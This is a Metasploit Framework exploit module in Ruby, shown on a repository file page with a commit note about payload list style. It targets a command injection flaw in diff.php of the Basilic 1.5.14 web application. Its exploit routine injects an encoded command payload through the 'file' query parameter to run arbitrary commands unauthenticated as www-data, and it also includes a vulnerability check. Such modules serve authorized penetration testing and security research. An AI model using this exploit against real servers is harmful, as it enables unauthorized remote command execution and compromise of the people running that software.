Files
metasploit-gs/modules/exploits/unix/webapp/basilic_diff_exec.rb
T
Tod Beardsley c547e84fa7 Prefer Ruby style for single word collections
According to the Ruby style guide, %w{} collections for arrays of single
words are preferred. They're easier to type, and if you want a quick
grep, they're easier to search.

This change converts all Payloads to this format if there is more than
one payload to choose from.

It also alphabetizes the payloads, so the order can be more predictable,
and for long sets, easier to scan with eyeballs.

See:
  https://github.com/bbatsov/ruby-style-guide#collections
2013-09-24 12:33:31 -05:00

107 lines
2.6 KiB
Ruby

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Basilic 1.5.14 diff.php Arbitrary Command Execution',
'Description' => %q{
This module abuses a metacharacter injection vulnerability in the
diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary
commands as the www-data user account.
},
'Author' =>
[
'lcashdollar',
'sinn3r',
'juan vazquez'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '83719' ],
[ 'BID', '54234' ]
],
'Platform' => %w{ linux unix },
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet'
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 28 2012'
))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to Basilic', '/basilic-1.5.14/'])
], self.class)
end
def check
base = normalize_uri(target_uri.path)
sig = rand_text_alpha(10)
res = send_request_cgi({
'uri' => normalize_uri("/#{base}/Config/diff.php"),
'vars_get' => {
'file' => sig,
'new' => '1',
'old' => '2'
}
})
if res and res.code == 200 and res.body =~ /#{sig}/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("Sending GET request...")
base = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => normalize_uri("/#{base}/Config/diff.php"),
'vars_get' => {
'file' => "&#{payload.encoded} #",
'new' => '1',
'old' => '2'
}
})
if res and res.code == 404 then
print_error("404 Basilic not installed or possibly check URI Path.")
else
vprint_line("Server returned #{res.code}")
end
handler
end
end